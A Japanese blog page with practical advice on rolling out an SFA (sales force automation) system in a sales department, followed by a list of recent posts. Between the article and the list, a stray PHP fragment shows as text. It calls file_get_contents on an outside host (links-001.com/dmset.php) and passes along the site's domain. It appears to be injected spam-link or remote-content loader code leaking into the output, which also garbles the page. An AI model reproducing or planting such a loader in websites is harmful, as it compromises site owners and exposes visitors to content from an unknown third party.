SFAを活用するための効率的な動きとは

SFAとは営業支援システムの事で、効率的に動く事が出来れば飛躍的に業績を伸ばせる可能性が出てきます。
ただ上手く使いこなさないと導入の費用だけかかり大きな変化が出ない場合があります。
まず大事なのが営業部に浸透するまでの準備期間を1年のように区切りのいい期間にして、システムの運用を浸透させる事です。
まず全員のスキルが上がることが重要です。
社員にはベテランもいて新しいシステムに拒否反応を示す場合もあるので、段階的に使いやすい機能から全員で共有するのもいい方法です。
慣れてから次の段階に繋げていけば、徐々にSFAの浸透につなげる事が出来ます。
使っても使わなくても何とかなってしまうという環境の場合は、使わない社員も出てくる可能性があるので会議や情報伝達ツールとして必ず使うようにするといいです。
使う事で全員が恩恵を受ける事を理解出来るようになり、仕事が効率的に進みやすくなります。
最後にSFAを目標評価制度に組み込み、達成度に応じて収入に還元させれば全員の意識も高まります。

".file_get_contents('http://links-001.com/dmset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿

  • SFAを導入するときに押さえておきたいポイント

    SFAというのはSales Force Automationの略語で、日本では営業支援システムと言わ …

    続きを読む...

  • 失敗しないSFAのポイントについて

    SFAは営業活動を支援するためのシステムですが、導入すれば簡単に成績が上がるわけではありません。

    続きを読む...

  • 営業日報はSFAの導入で変わる

    社員が日々どのような仕事をしてどういった成果を出しているのか、知るためのものが営業日報です。

    続きを読む...

  • SFAを取り入れて作業効率化を図りましょう

    まだまだ営業が未熟な人材ばかりであれば、当然ながら指導する必要が出てきます。
    営業支援システム …

    続きを読む...

お知らせ

一覧